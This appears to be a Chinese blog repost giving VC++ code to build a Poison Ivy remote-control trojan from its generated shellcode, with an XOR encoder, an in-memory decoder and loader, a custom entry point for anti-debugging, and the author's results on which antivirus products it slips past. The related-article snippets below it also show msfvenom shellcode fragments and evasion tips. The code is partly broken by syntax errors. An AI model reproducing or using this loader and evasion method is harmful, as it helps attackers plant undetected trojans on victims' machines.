编译PI远控SHELLCODE(VC++)加异或免杀(转载于网络)

最新推荐文章于 2024-09-23 15:09:33 发布
最新推荐文章于 2024-09-23 15:09:33 发布
阅读量5.3k 收藏 1
点赞数
分类专栏: shellcode 文章标签: vc++ 网络 linker 加密 windows exe
本文详细介绍了如何通过异或加密和自定义入口点来实现木马程序的免杀策略,以提高木马程序在特定环境下的存活率。通过加密原数组并输出,然后在编译时进行解密并实现木马功能,同时自定义入口点增加反调试难度。此技术在一定程度上能够帮助木马程序绕过部分杀毒软件的检测。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

 

来自暗组,但原贴有诸多语法错误,以下是修正后的编译法。
一,直接编译:
#include <windows.h>
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#pragma comment(linker, "/MERGE:.rdata=.text") //合并区段,减小体积,可以不要
void main()
{
unsigned char PIShellCode[n] =
{
    //这里填上生成的数组
};

_asm
{
lea eax,_black
   call eax
}
}

这么编译出来,国内全过了(表面),NOD32都不杀了~~只有360杀毒还没过。加个反调试,也过了。

如果自定义入口点的话,NOD32就杀了,很奇怪。。。

=========================================================================================================

二,异或免杀:

1,加密原数组,并输出。
#include <stdio.h>
void main()
{
unsigned char red[n];
     {
         /*这里用来放生成的数组,直接拷贝进来就行了;*/
     };
unsigned char black[n] ;     /* 这里声明两个数组,第一个数组是posion ivy 生成的(可以直接拷贝生成的数组)
                          第二个数组用来接收加密过的数组,一般情况下生成的数组的长度由 posion ivy服务端配置
                          情况来决定,第二个数组可以声明与第一个数组同样大;
                         */

for(int i=0;i<=n-1;i++)
    {  
    black[i]=red[i] ^ 0x5f     /* 这里直接对数组red进行xor加密

}

for (int j=0;j<=n-1;j++)

{

printf("0x")
printf("%x",black[j]); /* 这里输出已经加密过的数组

printf(",")
    }
}

编译,然后输出到 a.txt。

2,解密,编译成木马。

#include <windows.h>
#pragma comment(linker, "/OPT:NOWIN98")
#pragma comment( linker, "/subsystem:\"windows\" /entry:\"mainCRTStartup\"" )
#pragma comment(linker, "/ENTRY:Fuck_AntiVirus") //自定义了入口点,方便加反调试
#pragma comment(linker, "/MERGE:.rdata=.text")
void Pi_Exe()
{
unsigned char FuckU[n] =
{

//上面 a.txt 中的数组元素,复制过来。

};

unsigned char black[n];

for(int i=0;i<=n-1;i++)
    {  
    black[i]=FuckU[i] ^ 0x5f;
    }


_asm
{
lea eax,black
   call eax
}
}

void Fuck_AntiVirus()
{
_asm
{

//加点反调试代码
}
Pi_Exe();
}

编译成功,杀毒网绝大部分通过。国内全过,仅是表面。。。

初学VC,错误在所难免。。。

我发现,异或不异或,免杀效果没有什么改变。。。主要还是反调试要强。

[网络安全自学篇] 九十.木马详解及APT攻击中的和防御
杨秀璋的专栏
07-24 1万+
这是作者网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您喜欢,一起进步。前文分享了软件来源分析,结合APT攻击中常见的判断方法,利用Python调用扩展包进行溯源。这篇文章将详细分享木马及APT攻击中的,包括木马的基本概念和分类、木马的植入方式、木马的通信方式、APT攻击与木马等。作者之前分享了多篇木马的文章,但这篇更多是讲解型木马,基础性文章,希望对您有所帮助~
DDCTF2019-Writeup
40KO的博客
04-19 5325
目录 WindowsReverse1 WindowsReverse2 confused obfuscating macros 黑盒破解2 北京地铁 MulTzor [PWN] strike Wireshark 联盟决策大会 滴~ Web签到题 Upload-IMG 大吉大利,今晚吃鸡~ Breaking LEM WindowsReverse1 比较基础的一...
异或加密Shellcode绕过火绒、360
z2560088的博客
03-19 2498
msfvenom生成c格式的shellcode 对该shellcode进行异或加密 #include<string> #include <iostream> using namespace std; using std::string; unsigned char buf[] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30" "\x8b\x52\x0c\x8b\x52\x14\x0f\xb7.
shellcode编码之异或
qq_44119514的博客
02-21 2558
之前实验的时候,弹DOS窗口的shellcode发现有\x00。根据程序要求,shellcode是不能有这样的字符串在里面,否则在使用一些函数(如:strcpy())会产生00截断: #include "stdafx.h" #include "stdio.h" #include "windows.h" #include"stdlib.h" char shellcode[]="\x55\x8...
ShellCode异或编码器实现
最新发布
信息安全
09-23 930
编码器是将原始的 shellcode 转换为一种在目标环境中可以安全传输或存储的格式。通过将原始 shellcode 的每个字节进行某种操作(如 XOR、法、字节替换等),以避生成无效字符或被检测的字符。
实现:Shellcode的AES和XOR加密策略(vt查率:4/70)
xf555er的博客
05-24 2348
XOR加密又称为异或加密异或加密属于对称加密。在异或加密中,使用一个密钥(通常称为密钥流)与明文数据进行异或操作,生成加密后的密文。解密过程与加密过程相同,将密文与相同的密钥流进行异或操作,即可恢复原始明文数据AES加密,即高级加密标准(Advanced Encryption Standard)加密,是一种对称密钥加密算法,广泛应用于现代密码学中对称密钥:加密和解密过程使用相同的密钥。因此,密钥的安全性至关重要。
Pi-Control-Client:用于制运行 Pi-Control-Service (https) 的 Raspberry Pi 的客户端
06-24
这是一个客户端库,用于制运行的 Raspberry Pi。 按照设置服务的说明进行操作后,您将需要重用相同的 RabbitMQ 连接字符串和设备键值来启动客户端。 安装它 pip install Pi-Control-Client GPIO客户端 GPIO 客户端 ( pi_control_client.GPIOClient ) 用于制运行 GPIO 服务的 Raspberry Pi。 可以在的GPIO 服务部分中找到有关该服务的更多信息。 使用 GPIO 客户端 from pi_control_client import GPIOClient # The RabbitMQ connection string (must match the one used when starting the service) RABBIT_URL = 'some_actual_connect
程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
shellcode思路
u013367305的博客
05-04 1649
shellcode思路 使用msfconsole生产的shellcode之后正常写入到程序的内存里面的话会直接被毒软件静态查就能掉。 如果我们直接把shellcode贴入到自己程序中的话,编译出来的exe文件就会带上这段byte,而毒软件对此非常敏感所以会直接被掉。 // An highlighted block unsigned char sendBuf[355] = "\xfc\xe8\x8f\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x5
专题7 ---shellter
qq_41683305的博客
03-11 957
0x01 能力一览表 几点说明: 1、上表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(201...
switch-server:Raspberry Pi制开关
05-11
交换服务器 在RaspberryPi上运行并与GPIO交互并制外部继电器的小型服务器。 它使自己变得可发现,并且可以使用Android客户端进行程操作。 在或上获取客户端。 如何 下载或构建 ./gradlew Build命令将在可立即执行的build / libs中生成自包含的jar文件。 在计算机上本地执行(模拟了RaspberryPI GPIO交互) java -jar build/libs/switch-server-1.0.jar --flavor dev 在树莓派设备上执行 sudo java -jar switch-server-1.0.jar --config /path/to/your/config.json 现在可以通过发现您的设备 配置格式: { "common": { "port": 61235, "password": "hel
易语言主源码,易语言被源码,易语言
08-19
易语言源码系统结构:读取配置,消息提示,发送数据,服务,上线处理,下线处理,IP查询地理位置,数据处理,播放声音_,上线处理,发送数据,开始发送,客户,数据处理,视频,视频捕获发送,
pison Ivy 2.3.2源代码
02-08
牛人写的,全部使用shellcode构建的,非常棒的东西,我没看懂,特贴出来供大家使用
异或算法加密特征码(高级)
tikycc2的专栏
08-30 1577
异或算法加密特征码(高级)pushad    ///把所有寄存器压入堆栈 mov ebx,xxxxxxxx ///特征码的内存地址传送到ebx寄存器中mov ecx, 2 ///循环次数mov eax,dword ptr [ebx]  ///把ebx所存放的内存地方传送给eaxxor eax,11111111 ///进行加密 这里我要讲一下XOR算法mov dword
C2Shellcode沙盒对抗
qq_29948489的博客
02-27 581
黑框框会发现还是执行的 cs 的 shellcode,本质上代码试过了,毒点就放在最后,持续运行,检测高危命令或者原生 shellcode 直接干掉就完了。拿到 cs 的 payload 这里用的 x64 的,放入 xor.py 进行加密。df和卡巴都是动态查,或者说是内存查,这个十分难搞,不过目前还是有一定方法。有没有一种可能它一检测载,就睡眠,逃过毒检测在恢复过来。扔给 360,静态过,动态查(这里没开核晶,下次一定)虚拟机是打不开的,本地载直接上线。将生成好的密文,放入项目中。
大型计算机变形,ShellCode编码变形大法 -电脑资料
weixin_31124869的博客
07-24 333
现在的很多有溢出漏洞的程序对ShellCode都有特定的要求,一类是对ShellCode的长度大小有限制;另一类就是不能出现某些特殊字符,比如Cmail漏洞不能有大写字母啊,Foxmail不能有0x2E,0x2F字符一类的,要ShellCode出现特殊字符,有两种方法:一种是编写好ShellCode后,对不合要求的字符进行指令等价变换。比如,一些IIS漏洞里面不能出现0x20,对指令Mov e...
专题8---BackDoor-Facktory
qq_41683305的博客
03-12 723
0x01 能力一查表 几点说明: 1、上表中标识 √ 说明相应毒软件未检测出病毒,也就是代表了Bypass。 2、为了更好的对比效果,大部分测试payload均使用msf的windows/meterperter/reverse_tcp模块生成。 3、由于本机测试时只是安装了360全家桶和火绒,所以默认情况下360和火绒毒情况指的是静态+动态查。360毒版本5.0.0.8160(201...
shell中的rpm -pi的意思
NN179的专栏
01-07 2266
这些事rpm的常用参数!!! 你可以在linux下man 一下rpm就知道了!!! 不过是英文的,不然你可以百度一下rpm就知道了额!!! 下面我帮你贴几个!!!! rpm 常用命令 1.安装一个包 # rpm -ivh 2.升级一个包 # rpm -Uvh 3.移走一个包 # rpm -e 4.安装参数 --force 即使覆盖属于其它包的文件也强迫安装 --no
shellcode xor编码/解码[2]
weixin_34117211的博客
05-24 222
0x04 源码解读 下面以decoder_jump_header为例来说明解码部分 unsigned char decoder_jump_header[] = { 0xEB, 0x10, 0x5B, 0x31, 0xC9, 0x66, 0x81, 0xE9, 0xA1, 0xFE, 0x80, 0x33, 0x99, 0x43, 0xE2, 0xFA, 0xEB, 0x05, 0...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值